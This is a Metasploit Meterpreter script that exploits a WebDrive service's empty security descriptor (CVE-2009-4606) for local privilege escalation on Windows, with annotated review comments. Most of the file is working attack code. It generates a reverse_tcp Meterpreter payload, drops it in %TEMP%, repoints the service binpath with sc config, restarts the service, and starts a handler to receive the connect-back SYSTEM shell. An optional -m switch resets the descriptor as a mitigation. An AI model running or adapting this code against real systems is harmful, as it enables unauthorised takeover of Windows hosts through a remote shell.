# $Id$
# $Revision$

##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
# A mitigation option (-m) that resets the service's security descriptor is also included.
#
# Credit:
# - Discovery - Nine:Situations:Group::bellick
# - Meterpreter script - Trancer
#
# References:
# - http://retrogod.altervista.org/9sg_south_river_priv.html
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
# - http://osvdb.org/show/osvdb/59080
#
# mtrancer[@]gmail.com
# http://www.rec-sec.com
##

#
# Options
#
# Command-line switches accepted by this script. Each entry maps a switch to
# [takes_an_argument, description]; -r and -p consume a value, -h and -m do not.
opts = Rex::Parser::Arguments.new(
  '-h' => [false, 'This help menu'],
  '-m' => [false, 'Mitigate'],
  '-r' => [true,  'The IP of the system running Metasploit listening for the connect back'],
  '-p' => [true,  'The port on the remote host where Metasploit is listening']
)

#
# Default parameters
#

# Connect-back address: the local address Rex would use to reach 1.2.3.4;
# connect-back port: 4444. Both may be overridden with -r / -p below.
rhost = Rex::Socket.source_address('1.2.3.4')
rport = 4444
# Windows service name and process image name of the vulnerable WebDrive service.
sname = 'WebDriveService'
pname = 'wdService.exe'
# Check that the Meterpreter session runs on a supported (Windows) platform
# Abort the script on a non-Windows Meterpreter session: report the problem to
# the console, then raise Rex::Script::Completed so the script terminates cleanly.
def unsupported
  message = 'This version of Meterpreter is not supported with this Script!'
  print_error(message)
  raise Rex::Script::Completed
end
# Everything below relies on the Windows Service Control Manager (`sc`), so bail
# out unless the session platform is win32/win64.
unsupported if client.platform !~ /win32|win64/i
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
  case opt
  when "-h"
    print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
    print_line(opts.usage)
    raise Rex::Script::Completed
  when "-m"
    # Mitigation path: instead of exploiting the service, give it a proper DACL.
    client.sys.process.get_processes().each do |m|
      if ( m['name'] == pname )
        print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

        # Set correct service security descriptor to mitigate the vulnerability.
        # The SDDL string is the stock default service DACL: Authenticated Users (AU)
        # get query/status/interrogate rights only, Power Users (PU) additionally get
        # SERVICE_START (RP), Administrators (BA) get full control including
        # WRITE_DAC/WRITE_OWNER, and SYSTEM (SY) gets query plus start/stop/pause.
        # NOTE(review): the fix is only applied while wdService.exe is running; an
        # installed-but-stopped service is left with its empty descriptor.
        # 'Hidden' is passed as the string 'true' rather than a boolean — presumably
        # accepted by Meterpreter's execute; confirm.
        print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
        client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
          nil, {'Hidden' => 'true'})
      end
    end
    raise Rex::Script::Completed
  when "-r"
    # Connect-back host, taken verbatim; no validation is performed.
    rhost = val
  when "-p"
    # Connect-back port; String#to_i yields 0 for non-numeric input instead of failing.
    rport = val.to_i
  end
end

# Exploitation path — reached only when no option above raised Completed.
client.sys.process.get_processes().each do |m|
  if ( m['name'] == pname )

    print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

    # Build out the exe payload: a reverse_tcp Meterpreter stager pointed at rhost:rport,
    # wrapped into a Win32 PE by the framework.
    pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw = pay.generate

    exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

    # Place our newly created exe in %TEMP% under a random 6–13 character alphabetic name.
    # Nothing in this script deletes it afterwards, so it remains on disk as an artefact
    # (alongside the ImagePath change below) that a host investigation can look for.
    tempdir = client.fs.file.expand_path("%TEMP%")
    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
    print_status("Sending EXE payload '#{tempexe}'.")
    fd = client.fs.file.new(tempexe, "wb")
    fd.write(exe)
    fd.close

    # Stop the vulnerable service
    print_status("Stopping service \"#{sname}\"...")
    client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})

    # Set exe payload as service binpath. This is the escalation step: the empty
    # security descriptor lets an unprivileged user reconfigure the service, and the
    # replacement image is then started by the SCM with the service's own privileges.
    # On the host this appears as a modification of the service's ImagePath value.
    print_status("Setting \"#{sname}\" to #{tempexe}...")
    client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
    sleep(1)

    # Restart the service
    print_status("Restarting the \"#{sname}\" service...")
    client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})

    # Our handler to receive the callback. It is created after the start command has
    # already been issued and runs as a background job (RunAsJob) that stays up after
    # the first session (ExitOnSession = false).
    handler = client.framework.exploits.create("multi/handler")
    handler.datastore['WORKSPACE'] = client.workspace
    handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
    handler.datastore['LHOST'] = rhost
    handler.datastore['LPORT'] = rport
    handler.datastore['ExitOnSession'] = false

    handler.exploit_simple(
      'Payload' => handler.datastore['PAYLOAD'],
      'RunAsJob' => true
    )

    # Set service binpath back to normal. The restore hard-codes the default install
    # location %ProgramFiles%\WebDrive; a non-default install is left with a binpath
    # that points at a nonexistent file.
    # NOTE(review): the security descriptor itself is not repaired on this path, so the
    # service remains vulnerable unless the script is re-run with -m.
    client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})

  end
end